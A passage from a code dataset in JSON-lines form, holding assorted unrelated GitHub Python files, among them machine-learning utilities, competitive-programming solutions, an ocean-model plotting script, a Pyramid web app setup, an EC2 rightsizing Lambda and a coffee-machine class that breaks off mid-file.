print(acc)\n\n error1 = loss(y, ypred)\n print(\"loss: \", sum(np.abs(error1)))\n","repo_name":"Lilliangreve/Backpropagation","sub_path":"backprop_blobs.py","file_name":"backprop_blobs.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4102496183","text":"import json\nimport urllib\nimport torch\nimport torch.nn as nn\nimport pandas as pd\nfrom pathlib import Path\nfrom itertools import repeat\nfrom collections import OrderedDict\n\n\nfrom typing import Tuple, Union, Callable, Optional, Any\n\n\ndef get_output_shape(model: nn.Module, input_shape: Tuple[int, int, int, int]) -> Tuple[int, int, int, int]:\n # Figure out the output shape of an nn.Module.\n # taken from: https://stackoverflow.com/a/62197038\n return model(torch.rand(*(input_shape))).data.shape\n\n\ndef get_url_filename(url: str) -> str:\n req = urllib.request.Request(url, method=\"HEAD\")\n req_info = urllib.request.urlopen(req).info()\n\n # Detect filename\n return req_info.get_filename()\n\n\ndef ensure_dir(dirname):\n dirname = Path(dirname)\n if not dirname.is_dir():\n dirname.mkdir(parents=True, exist_ok=False)\n\n\ndef read_json(fname):\n fname = Path(fname)\n with fname.open('rt') as handle:\n return json.load(handle, object_hook=OrderedDict)\n\n\ndef write_json(content, fname):\n fname = Path(fname)\n with fname.open('wt') as handle:\n json.dump(content, handle, indent=4, sort_keys=False)\n\n\ndef inf_loop(data_loader):\n ''' wrapper function for endless data loader. '''\n for loader in repeat(data_loader):\n yield from loader\n\n\ndef prepare_device(n_gpu_use):\n \"\"\"\n setup GPU device if available. get gpu device indices which are used for DataParallel\n \"\"\"\n n_gpu = torch.cuda.device_count()\n if n_gpu_use > 0 and n_gpu == 0:\n print(\"Warning: There\\'s no GPU available on this machine,\"\n \"training will be performed on CPU.\")\n n_gpu_use = 0\n if n_gpu_use > n_gpu:\n print(f\"Warning: The number of GPU\\'s configured to use is {n_gpu_use}, but only {n_gpu} are \"\n \"available on this machine.\")\n n_gpu_use = n_gpu\n device = torch.device('cuda:0' if n_gpu_use > 0 else 'cpu')\n list_ids = list(range(n_gpu_use))\n return device, list_ids\n\n\nclass MetricTracker:\n def __init__(self, *keys, writer=None):\n self.writer = writer\n self._data = pd.DataFrame(\n index=keys, columns=['total', 'counts', 'average'])\n self.reset()\n\n def reset(self):\n for col in self._data.columns:\n self._data[col].values[:] = 0\n\n def update(self, key, value, n=1):\n if self.writer is not None:\n self.writer.add_scalar(key, value)\n self._data.total[key] += value * n\n self._data.counts[key] += n\n self._data.average[key] = self._data.total[key] / \\\n self._data.counts[key]\n\n def avg(self, key):\n return self._data.average[key]\n\n def result(self):\n return dict(self._data.average)\n","repo_name":"piptouque/atiam_audio_network_hacking","sub_path":"code/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11562522480","text":"# https://www.acmicpc.net/problem/1157\n\n\ns = input().upper()\nl1 = list()\nl2 = list()\n\n#알파벳 갯수 세기\nfor i in range(ord(\"A\"),ord(\"Z\")+1):\n l1.append(s.count(chr(i)))\n\n# 갯수 중 가장 큰 수\nmax = max(l1)\n\n# 가장 큰 수의 index를 l2에 넣기\nfor i in range(len(l1)):\n if l1[i] == max :\n l2.append(i)\n\n# 조건에 맞게 출력\nif len(l2) == 1 :\n ascii_code=ord('A')+l2[0]\n print(chr(ascii_code))\nelse :\n print(\"?\")\n","repo_name":"Overclock7/Baekjoon","sub_path":"Python/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4458361664","text":"NUM_TESTS = 140\nNUM_EVALS = 55\n#NUM_CLASSES = 134\n#NUM_CLASSES = 47\nNUM_CLASSES = 11\nNUM_EPOCHS = 10\nNUM_MINI_BATCH = 64\nEMBEDDING_SIZE = 128\nNUM_FILTERS = 128\nFILTER_SIZES = [ 3, 4, 5 ]\nL2_LAMBDA = 0.0001\nEVALUATE_EVERY = 100\nCHECKPOINTS_EVERY = 1000\n\nSUMMARY_LOG_DIR = 'summary_log'\nCHECKPOINTS_DIR = 'checkpoint'\nCHECKPOINTS_FILE = CHECKPOINTS_DIR + '/cnn_' + str(NUM_CLASSES) + '.h5'\n\nOUTPUT_FILE = CHECKPOINTS_DIR + '/cnn_output_' + str(NUM_CLASSES) + '.csv'\n\nRAW_FILE = 'data/raw_' + str(NUM_CLASSES) + '.txt'\nDATA_FILE = 'data/data.npy'\nLABEL_FILE = 'data/labels.npy'\nDICTIONARY_FILE = 'data/dictionaries.npy'\n\nEVAL_DATA_FILE = 'data/data.npy'\nEVAL_LABEL_FILE = 'data/labels.npy'","repo_name":"coolerking/ai_example","sub_path":"keras_classifier/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20956615926","text":"from cx_Freeze import setup, Executable\n\nbuild_exe_options = {\n \"packages\": [\"pygame\", \"OpenGL\", \"random\", \"requests\", \"threading\", \"datetime\", \"itertools\", \"moviepy\", \"websockets\"],\n \"include_files\": [\"loop.wav\", \"pong.wav\", \"ping.wav\", \"surf.wav\", \"drop.wav\", \"warp.wav\", \"oof.wav\", \"keywords.txt\"],\n \"excludes\": []\n}\n\nsetup(\n name=\"MUSICUBE\",\n version=\"0.1\",\n options={\"build_exe\": build_exe_options},\n executables=[Executable(\"MUSICUBE_2045.py\")]\n)\n","repo_name":"Mind-Interfaces/HACKATHON","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"72714747363","text":"\n\"\"\"\nCreated on 5 Sept 2019\nplot horizontal slice of FVCOM\n@author: JiM\nModified in Feb 2021 to work examine Dec 2020 MAB event\n\"\"\"\n# routine to plot FVCOM surface temps\n# taken from Rich's blog at\n# http://rsignell-usgs.github.io/blog/blog/2014/01/08/fvcom/\n\nfrom pylab import *\nimport matplotlib.tri as Tri\nimport netCDF4\nfrom datetime import datetime as dt\nimport pandas as pd\n\n\n############################\n# HARDCODES\nmode='Forecasts' # or Hindcasts\n#run='FVCOM_OCEAN_MASSBAY' # only needed in Forecasts case\nrun='GOM3'\ndtime=dt(2022,6,7,6,0,0)\narea='GS'#'inside_CCBAY'\nlayer='surface' # or bottom\nlevels=arange(7*1.8+32,26*1.8+32,.5) # min,max,int in degC changed to degF\nlevels=arange(45,78,1.0)\nmaxvel = 1.0 # for quiver legend\nsubsample = 50\ndef getgbox(area):\n # gets geographic box based on area\n if area=='SNE':\n gbox=[-70.,-64.,39.,42.] # for SNE\n elif area=='GBANK':\n gbox=[-70.,-64.,39.,42.] # for SNE\n elif area=='GS': \n gbox=[-71.,-65.,38.,42.] # for Gulf Stream\n elif area=='NorthShore':\n gbox=[-71.,-70.,42.,43.] # for north shore\n elif area=='CCBAY':\n gbox=[-70.75,-69.8,41.5,42.23] # CCBAY\n elif area=='inside_CCBAY':\n gbox=[-70.75,-70.,41.7,42.23] # CCBAY \n return gbox\n\n## DAP Data URL\nif mode=='Forecasts':\n\turl = 'http://www.smast.umassd.edu:8080/thredds/dodsC/FVCOM/NECOFS/Forecasts/NECOFS_'+run+'_FORECAST.nc'\nelse:\n\turl='http://www.smast.umassd.edu:8080/thredds/dodsC/fvcom/hindcasts/30yr_gom3'\n\t\nnc = netCDF4.Dataset(url).variables\n\n#start = dt.datetime.utcnow() + dt.timedelta(hours=18)\ntime_var = nc['time']\nitime = netCDF4.date2index(dtime,time_var,select='nearest')\n\n# Get lon,lat coordinates for nodes (depth)\nlat = nc['lat'][:]\nlon = nc['lon'][:]\n# Get lon,lat coordinates for cell centers (depth)\nlatc = nc['latc'][:]\nlonc = nc['lonc'][:]\nh=nc['h'][:]\n# Get Connectivity array\nnv = nc['nv'][:].T - 1 \n# Get depth\n#h = nc['h'][:] # depth\n\ndtime = netCDF4.num2date(time_var[itime],time_var.units)\ndaystr = dtime.strftime('%Y-%b-%d %H:%M')\n#print(daystr)\n\ntri = Tri.Triangulation(lon,lat, triangles=nv)\nif layer=='surface':\n\tilayer = 0 #surface\nelse:\n\tilayer =-1 #bottom\nsst = nc['temp'][itime, ilayer, :]*1.8+32\n#u=nc['ua'][itime,:]# vertically averaged\n#v=nc['va'][itime,:]\nu=nc['u'][itime,ilayer,:]# \nv=nc['v'][itime,ilayer,:]\n# define contour levels if blank\nif len(levels)==0:\n\tlevels=arange(int(min(sst)),int(max(sst)+1),1)\nax = getgbox(area)# returns a geographic box like [-70.7, -70.6, 41.48, 41.55]\n\n\n# find velocity points in bounding box\nidv = argwhere((lonc >= ax[0]) & (lonc <= ax[1]) & (latc >= ax[2]) & (latc <= ax[3]))\nidv=idv[0::subsample]\nfigure(figsize=(12,8))\nsubplot(111,aspect=(1.0/cos(mean(lat)*pi/180.0)))\n#tricontourf(tri, sst,levels=levels,shading='faceted',cmap=plt.cm.gist_earth)\ntricontourf(tri, sst,levels=levels,shading='faceted',cmap=plt.cm.jet)\naxis(ax)\ngca().patch.set_facecolor('0.5')\ncbar=colorbar()\ncbar.set_label('SST (degF)', rotation=-90)\nQ = quiver(lonc[idv],latc[idv],u[idv],v[idv],scale=20)\nmaxstr='%3.1f m/s' % maxvel\nqk = quiverkey(Q,0.92,0.08,maxvel,maxstr,labelpos='W')\ncoastfilename='c:/users/james.manning/Downloads/basemaps/capecod_coastline_detail.csv'\ndf=pd.read_csv(coastfilename)\nplt.plot(df.lon,df.lat,'k.',markersize=1)\n#plt.tricontour(Grid['lon'],Grid['lat'],Grid['h'],[200.],colors='purple')\nplt.tricontour(lon,lat,h,[200.],colors='purple')\ntitle('FVCOM '+layer+' %s ' % (daystr[0:12])+' '+mode)\n#savefig('/net/pubweb_html/epd/ocean/MainPage/turtle/ccbay/FVCOM_sst_'+daystr[0:12]+'+.png')\nsavefig('FVCOM_sst_'+area+'_'+daystr[0:12]+'+.png')\n\n\n\n","repo_name":"jamespatrickmanning/fvcom_viz","sub_path":"plot_fvcom_surf_temp.py","file_name":"plot_fvcom_surf_temp.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32385831369","text":"import sys\n\ninput = sys.stdin.readline\n\n\ndef is_pelindrome(string):\n for i in range(len(string) // 2):\n if string[i] != string[len(string) - 1 - i]:\n return False\n return True\n\n\nt = int(input())\n\nfor _ in range(t):\n n = int(input())\n num = int(input())\n x1 = int(\"1\" + \"0\" * (n - 1) + \"1\")\n x2 = int(\"1\" * (n + 1))\n\n if len(str(x1 - num)) == n:\n print(str(x1 - num))\n continue\n\n if len(str(x2 - num)) == n:\n print(str(x2 - num))\n continue\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/Codeforces/1700B_PalindromicNumbers.py","file_name":"1700B_PalindromicNumbers.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33907448701","text":"from builtins import str\nfrom builtins import object\nfrom qgis.core import QgsFeature\nfrom qgis.PyQt.QtWidgets import (QDialog, QComboBox)\nfrom .ui_distromap import Ui_DistroMap\n\n# Add a method to QComboBox to get the current item data\ndef currentItemData(self):\n return str(self.itemData(self.currentIndex()))\n\nQComboBox.currentItemData = currentItemData\n\nclass Features(object):\n# Class adapted from version in Sextante QGisLayers driver (by Victor Olaya)\n\n def __init__(self, layer):\n self.layer = layer\n self.iter = layer.getFeatures()\n self.selection = False;\n self.selected = layer.selectedFeatures()\n if len(self.selected) > 0:\n self.selection = True\n self.idx = 0;\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.selection:\n if self.idx < len(self.selected):\n feature = self.selected[self.idx]\n self.idx += 1\n return feature\n else:\n raise StopIteration()\n else:\n if self.iter.isClosed():\n raise StopIteration()\n f = QgsFeature()\n if self.iter.nextFeature(f):\n return f\n else:\n self.iter.close()\n raise StopIteration()\n\n def __len__(self):\n if self.selection:\n return int(self.layer.selectedFeatureCount())\n else:\n return int(self.layer.featureCount())\n\n\nclass DistroMapDialog(QDialog):\n def __init__(self):\n QDialog.__init__(self)\n # Set up the user interface from Designer.\n self.ui = Ui_DistroMap()\n self.ui.setupUi(self)\n","repo_name":"rudivs/DistroMap","sub_path":"distromapdialog.py","file_name":"distromapdialog.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39568319614","text":"\"\"\"\nCP1404/CP5632 Practical - Project class\nEstimate - 2 hours\n\"\"\"\nimport datetime\n\n\nclass Project:\n \"\"\"Represent a project\"\"\"\n\n def __init__(self, name, start_date, priority, cost_estimate, completion_percentage):\n \"\"\"Initialise a project\"\"\"\n self.name = name\n self.start_date = start_date\n self.priority = priority\n self.cost_estimate = cost_estimate\n self.completion_percentage = completion_percentage\n\n def __str__(self):\n \"\"\"Return formatted project as string\"\"\"\n return f\"{self.name}, start: {datetime.datetime.strftime(self.start_date, '%d/%m/%Y')},\" \\\n f\" priority {self.priority}, estimate: ${self.cost_estimate:.2f}, \" \\\n f\"completion: {self.completion_percentage}%\"\n\n def __repr__(self):\n \"\"\"return list objects in string format\"\"\"\n return str(self)\n\n def is_complete(self):\n \"\"\"Return true or False if completion percentage is 100 or not\"\"\"\n return self.completion_percentage == 100\n\n def __lt__(self, other):\n \"\"\"Return True/False if one value is less than other or not.\"\"\"\n return self.priority < other.priority\n\n\ndef run_tests():\n \"\"\"Test project class.\"\"\"\n p1 = Project(name=\"Build Car Park\", start_date=datetime.datetime.strptime(\"9/1/2021\", '%d/%m/%Y'), priority=2,\n cost_estimate=600000.0,\n completion_percentage=95)\n p2 = Project(name=\"Test\", start_date=datetime.datetime.strptime(\"9/2/2021\", '%d/%m/%Y'), priority=3,\n cost_estimate=700.0,\n completion_percentage=100)\n print(p1)\n print(p1.is_complete())\n print(p2)\n print(p1.is_complete())\n print(p1 < p2)\n\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"RashmiPokuru/cp1404practicals","sub_path":"prac_07/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27610406251","text":"from pyramid.config import Configurator\nimport pymongo\nimport pika\n\n\ndef main_api(global_config, **settings):\n \"\"\"\n This function returns a Pyramid WSGI application.\n \"\"\"\n config = Configurator(settings=settings)\n\n config.registry.db = pymongo.MongoClient(settings['mongo.uri'])['ebretail']\n\n # Open a connection to the message broker\n amqpConnection = pika.BlockingConnection(pika.ConnectionParameters(settings['amqp.uri']))\n def getMessagingChannel():\n nonlocal amqpConnection\n try:\n return amqpConnection.channel()\n except pika.exceptions.ConnectionClosed:\n amqpConnection = pika.BlockingConnection(pika.ConnectionParameters(settings['amqp.uri']))\n return getMessagingChannel()\n\n config.registry.getMessagingChannel = getMessagingChannel\n\n # Add our custom file renderer, used for endpoints that serve files from Mongos GridFS\n config.add_renderer('file', 'ebretail.components.file_renderer.FileRenderer')\n config.add_renderer('bson', 'ebretail.components.bson_renderer.BSONRenderer')\n\n config.add_static_view('static', 'static', cache_max_age=3600)\n config.add_route('collect_images', '/collect_images')\n config.add_route('register_collector', '/register_collector')\n\n\n config.add_route('home', '/')\n config.scan('ebretail.endpoints')\n\n return config.make_wsgi_app()\n\n\ndef image_processor_microservice(global_config, **settings):\n \"\"\"\n This function returns a Pyramid WSGI application for the\n image processor microservice\n \"\"\"\n config = Configurator(settings=settings)\n\n # Open a connection to the message broker\n config.registry.amqpConnection = pika.BlockingConnection(pika.ConnectionParameters(settings['amqp.uri']))\n\n # Add our custom file renderer, used for endpoints that serve files from Mongos GridFS\n config.add_renderer('file', 'ebretail.components.file_renderer.FileRenderer')\n config.add_renderer('bson', 'ebretail.components.bson_renderer.BSONRenderer')\n\n config.add_route('process_image', '/process_image')\n config.scan('ebretail.processor_endpoints')\n return config.make_wsgi_app()\n\n\n__all__ = [\"main_api\", \"image_processor_microservice\"]","repo_name":"benbricksanalytics/eb-retail","sub_path":"server/ebretail/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25230557802","text":"#/usr/bin/python3\nimport io\nimport requests\nfrom PIL import Image\nimport numpy as np\nfrom matplotlib import pylab as plt\narr = [0x00, 0x5F, 0x87, 0xAF, 0xD7, 0xFF]\n\n\ndef get_place(num):\n if num == 0xff:\n return 5\n for index, i in enumerate(arr):\n if i > num:\n return index - (1 if num - arr[index - 1] <= i - num else 0)\n\n\ndef color(num):\n if num%0xa0a0a == 0x80808:\n return 232 + int((num - 0x080808) / 0xa0a0a)\n pos = 16\n for i in range(3):\n pos += get_place(num & 0xff) * 6**i\n num >>= 8\n return pos\n\n\ndef mkcl(num):\n return \"\u001B[38;5;{}m\".format(num)\n\n\ndef mkclb(num):\n return \"\u001B[48;5;{}m\".format(num)\n\n\ndef resize(img, to_size):\n size = img.size\n if size[0] < size[1]: # vertical\n ratio = size[1] / to_size\n img = img.resize((int(size[0] // ratio), to_size))\n else: # oblong\n ratio = size[0] / to_size\n img = img.resize((to_size, int(size[1] // ratio)))\n return img\n\n\ndef load_img(url):\n return Image.open(io.BytesIO(requests.get(url).content))\n\n\ndef create_data(img, size=None):\n img = load_img(img) if type(img) == str else img\n\n if size == None: img = np.array(img)\n else: img = np.array(resize(img, int(size)))\n\n result = \"\"\n for line in [[(color[0] << 16) | (color[1] << 8) | color[2] for color in column] for column in img]:\n for i in line:\n result += mkcl(color(i)) + \"##\"\n result += \"\\n\"\n return result\n\n\nif __name__ == \"__main__\":\n import sys\n def display(filename, url, size=180):\n print(create_data(url, size))\n\n display(*sys.argv)\n","repo_name":"ctare/cuiImage","sub_path":"cuiImage.py","file_name":"cuiImage.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"10271214946","text":"#user define exception\r\n#AS A DEVELOPER AS PER YOUR SOFTWARE NEED WE CREATE EXCEPTION\r\n#KNOWN AS USER DEFINE EXCEPTION\r\n# TO CREATE USER DEFINE EXCEPTION WE HAVE TO INHERIT PARENT EXCEPTION CLASS\r\n# NAME AS EXCEPTION\r\n\r\n\r\nclass AgeValidError(Exception):\r\n pass\r\nclass Voiting(AgeValidError):\r\n Bjp=0\r\n Congress=0\r\n AAP=0\r\n nota=0\r\n\r\n\r\n\r\n def __init__(self):\r\n self.name=input(\"Enter your name => \")\r\n self.age=int(input(\"Enter Your Age => \"))\r\n self.aadharno=input(\"Enter your aadhar card no=> \")\r\n\r\n def vote(self):\r\n if self.age <=18:\r\n raise AgeValidError(\"not Eligible for voiting\")\r\n else:\r\n print(\"1 for Bjp\\n2 for Congress\\n3 for AAP\")\r\n ch=int(input(\"enter your choice \"))\r\n if ch==1:\r\n Voiting.Bjp+=1\r\n elif ch==2:\r\n Voiting.Congress+=1\r\n elif ch==3:\r\n Voiting.AAP+=1\r\n else:\r\n Voiting.nota+=1\r\n\r\n\r\n\r\ndef main():\r\n while True:\r\n try:\r\n v=Voiting()\r\n v.vote()\r\n except AgeValidError as ave:\r\n print(ave)\r\n finally :\r\n print(\"wait for result\")\r\n\r\n\r\n ch=input(\"next votter plz......(y/n)=> \")\r\n if ch in ('y','Y'):\r\n continue\r\n else:\r\n break\r\n print(\"*********************RESULT*************************\")\r\n print(\"BJP\\tCONGRESS\\tAAP\\tNOTA\")\r\n print(Voiting.Bjp,'\\t',Voiting.Congress,'\\t\\t',Voiting.AAP,'\\t',Voiting.nota)\r\n \r\n \r\n \r\n \r\n","repo_name":"ATUL786pandey/python-class-demo","sub_path":"voiting user exception.py","file_name":"voiting user exception.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3995670969","text":"import cv2\nimport numpy as np\n\nfrom time import time\nfrom detector import MotionDetector\nfrom packer import pack_images\nfrom numba import jit\n\n\n@jit(nopython=True)\ndef filter_fun(b):\n return ((b[2] - b[0]) * (b[3] - b[1])) > 300\n\n\nif __name__ == \"__main__\":\n\n cap = cv2.VideoCapture('tmp/helmets-v1-55.mp4')\n # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)\n # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)\n\n detector = MotionDetector(bg_history=10,\n bg_skip_frames=1,\n movement_frames_history=2,\n brightness_discard_level=5,\n bg_subs_scale_percent=0.2,\n pixel_compression_ratio=0.1,\n group_boxes=True,\n expansion_step=5)\n\n # group_boxes=True can be used if one wants to get less boxes, which include all overlapping boxes\n\n b_height = 320\n b_width = 320\n\n res = []\n fc = dict()\n ctr = 0\n while True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n if frame is None:\n break\n\n begin = time()\n\n boxes, frame = detector.detect(frame)\n # boxes hold all boxes around motion parts\n\n ## this code cuts motion areas from initial image and\n ## fills \"bins\" of 320x320 with such motion areas.\n ##\n results = []\n if boxes:\n results, box_map = pack_images(frame=frame, boxes=boxes, width=b_width, height=b_height,\n box_filter=filter_fun)\n # box_map holds list of mapping between image placement in packed bins and original boxes\n\n ## end\n\n for b in boxes:\n cv2.rectangle(frame, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 1)\n\n end = time()\n it = (end - begin) * 1000\n\n res.append(it)\n print(\"StdDev: %.4f\" % np.std(res), \"Mean: %.4f\" % np.mean(res), \"Last: %.4f\" % it,\n \"Boxes found: \", len(boxes))\n\n if len(res) > 10000:\n res = []\n\n # idx = 0\n # for r in results:\n # idx += 1\n # cv2.imshow('packed_frame_%d' % idx, r)\n\n ctr += 1\n nc = len(results)\n if nc in fc:\n fc[nc] += 1\n else:\n fc[nc] = 0\n\n if ctr % 100 == 0:\n print(\"Total Frames: \", ctr, \"Packed Frames:\", fc)\n\n cv2.imshow('last_frame', frame)\n cv2.imshow('detect_frame', detector.detection_boxed)\n cv2.imshow('diff_frame', detector.color_movement)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n print(fc, ctr)\n","repo_name":"bwsw/rt-motion-detection-opencv-python","sub_path":"example/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"54"} +{"seq_id":"6866363521","text":"import boto3\nimport os\nfrom datetime import datetime, timedelta\n\ndef determine_next_maintenance_window():\n maintenance_window_day = os.environ.get('MaintenanceWindowDay')\n maintenance_window_time = os.environ.get('MaintenanceWindowTime')\n\n # Determine the next maintance window\n hour = datetime.strptime(maintenance_window_time, \"%H:%M\").time()\n weekdays = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n weekday = weekdays.index(maintenance_window_day)\n now = datetime.utcnow()\n days_until_maintance_window = (7 + weekday - now.weekday()) % 7\n if days_until_maintance_window == 0 and now.time() > hour:\n days_until_maintance_window = 7\n \n time_until_maintance_window = timedelta(days=days_until_maintance_window)\n next_maintance_window = now + time_until_maintance_window\n next_maintance_window = next_maintance_window.replace(hour=hour.hour, minute=hour.minute, second=0, microsecond=0)\n maintance_window_utc_timestamp = next_maintance_window.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n return maintance_window_utc_timestamp\n\n\ndef lambda_handler(event, context):\n \n exclude_tag = os.environ['ExcludeTag']\n email_approval = os.environ['EmailApproval']\n architectural_change = os.environ['ArchitecturalChange']\n risk_profile = ['No Risk', 'Very Low', 'Low', 'Medium', 'High', 'Very High'].index(os.environ['RiskProfile'])\n ec2_id = event['InstanceArn'].split('/')[1]\n region = event['InstanceArn'].split(':')[3]\n return_message = {\n \"change_option_detected\": False,\n \"ec2_id\": ec2_id,\n \"InstanceArn\": event['InstanceArn'],\n \"ec2_name\": event['InstanceName'],\n \"message\": \"None of the recommendations met the requirements\"\n }\n \n maintance_window_utc_timestamp = determine_next_maintenance_window()\n\n ec2 = boto3.resource('ec2')\n ec2_instance = ec2.Instance(ec2_id)\n stop_protection = ec2_instance.describe_attribute(Attribute='disableApiStop')\n if stop_protection['DisableApiStop']['Value'] == True:\n return_message[\"message\"] = \"The instance was configured with Stop Protection\"\n return return_message\n\n ec2_client = boto3.client('ec2', region_name=region)\n response = ec2_client.describe_instances(InstanceIds=[ec2_id])\n tags = response['Reservations'][0]['Instances'][0]['Tags']\n\n for tag in tags:\n if tag['Key'] == exclude_tag:\n return_message[\"message\"] = \"The instance is excluded from the Compute Optimization automate recommendations (due to the tag)\"\n return return_message\n \n if tag['Key'] == 'aws:autoscaling:groupName':\n return_message[\"message\"] = \"The instance is part of an ASG\"\n return return_message\n \n if response['Reservations'][0]['Instances'][0]['CapacityReservationSpecification']['CapacityReservationPreference'] != 'open':\n return_message[\"message\"] = \"The instance is part of an ODCR\"\n return return_message\n\n if response['Reservations'][0]['Instances'][0]['Placement']['GroupName'] != '':\n return_message[\"message\"] = \"The instance is part of a Placement Group\"\n return return_message\n \n # # Validate that the instance has CloudWatch Agent installed\n # cw_agent_installed = False\n # for utilization_metric in event['UtilizationMetrics']:\n # if utilization_metric['Name'] == 'MEMORY':\n # cw_agent_installed = True\n \n # if not cw_agent_installed:\n # return_message[\"message\"] = 'The instance does not have CloudWatch Agent installed'\n # return return_message\n \n for recommendation in event['RecommendationOptions']:\n if recommendation['PerformanceRisk'] <= risk_profile and 'SavingsOpportunity' in recommendation:\n if recommendation['InstanceType'] == event['CurrentInstanceType']:\n continue\n \n if 'Architecture' in recommendation['PlatformDifferences'] and architectural_change != 'yes':\n continue\n\n if 'Hypervisor' not in recommendation['PlatformDifferences'] and recommendation['SavingsOpportunity'] != None:\n if 'InstanceStoreAvailability' in recommendation['PlatformDifferences']:\n continue\n \n return {\n \"change_option_detected\": True,\n \"email_approval\": email_approval,\n \"maintenance_window\": maintance_window_utc_timestamp,\n \"InstanceArn\": event['InstanceArn'],\n \"ec2_id\": ec2_id,\n \"ec2_name\": event['InstanceName'],\n \"ec2_new_instance_type\": recommendation['InstanceType'],\n \"ec2_current_instance_type\": event['CurrentInstanceType'],\n \"migration_effort\": recommendation['MigrationEffort'],\n \"performance_risk\": recommendation['PerformanceRisk'],\n \"savings_opportunity\": recommendation['SavingsOpportunity']['EstimatedMonthlySavings']['Value'],\n \"savings_opportunity_percentage\": recommendation['SavingsOpportunity']['SavingsOpportunityPercentage']\n }\n \n return return_message","repo_name":"aws-samples/compute-optimizer-automation","sub_path":"src/lambda/validate-instance.py","file_name":"validate-instance.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40972287099","text":"import math\nfrom time import sleep\n\nclass CoffeeMachine():\n\n def __init__(self,milk: int,water:int ,coffee:int ) -> None:\n \"\"\"Initialize coffee machine with milk, water and coffee amount\"\"\"\n self.milk = milk\n self.water = water\n self.coffee = coffee\n self.profit = 0\n\n print(f\"I prepare espress, capuccino and latte from {self.milk},{self.coffee} and {self.water}\")\n \n def prepare_latte():\n pass\n\n def accept_coins(self,amount):\n user_input = float(0)\n inputing_coin = True\n while inputing_coin:\n coin = input(\"Please insert coins: \")\n if coin == \"nickel\":\n user_input = math.fsum([user_input, 0.5])\n elif coin == \"quarter\":\n user_input = math.fsum([user_input,0.25]) \n elif coin == \"dimes\":\n user_input = math.fsum([user_input,0.05])\n elif coin == \"dollar\":\n user_input = math.fsum([user_input,1.0])\n elif coin == \"done\":\n if user_input >= amount:\n self.__return_exchange(user_input-amount)\n return True\n else:\n print(\"Insufficient amount. You don't get coffee!\")\n self.__return_exchange(user_input)\n return False\n def add_profit(self,amount):\n print(f\"Adding profit of {amount}$\")\n self.profit = math.fsum([self.profit,amount])\n\n def prepare_cappucino(self):\n self.milk -= 150\n self.coffee -= 50\n self.water -= 50\n\n for i in range(10):\n print(\"..\",end=\"\",flush=True)\n sleep(1)\n print(\"\\nYour Cappucino is ready, enjoy!\")\n return True\n \n def prepare_latte(self):\n self.milk -= 200\n self.coffee -= 30\n self.water -= 50\n\n for i in range(10):\n print(\"..\",end=\"\",flush=True)\n sleep(1)\n print(\"\\nYour Latte is ready, enjoy!\")\n return True\n \n def prepare_espresso(self):\n self.water -= 50\n self.coffee -= 30\n for i in range(5):\n print(\"..\",end=\"\",flush=True)\n sleep(1)\n print(\"\\nYour espresso is ready, enjoy!\")\n return True\n \n def check_avaiable_materials(self,water=0,milk=0,coffee=0):\n is_available = True\n if self.water < water:\n is_available = False\n print(\"Sorry, not enough water in machine\")\n return is_available\n if self.coffee < coffee:\n is_available = False\n print(\"Sorry, not enough coffee in machine\")\n return is_available\n if self.milk < milk:\n is_available = False\n print(\"Sorry, not enough milk in machine\")\n return is_available\n return is_available\n\n def report(self):\n print(f\"Current situation is:\\nMilk: {self.milk}\\nCoffee: {self.coffee}\\nWater: {self.water}\\nProfit: {self.profit}$\")\n\n @staticmethod\n def __return_exchange(amount):\n if amount == 0.0:\n return\n print(f\"Please take your change of {amount}$\")\n \n def operate(self):\n operating_condition = True\n\n while operating_condition:\n user_choice = input(\"What would you like? \")\n if user_choice == \"off-operator\": \n print(\"Coffee Machine going to sleep\")\n operating_condition = False\n\n elif user_choice == \"latte\":\n if self.check_avaiable_materials(water=50,milk=200,coffee=30):\n if 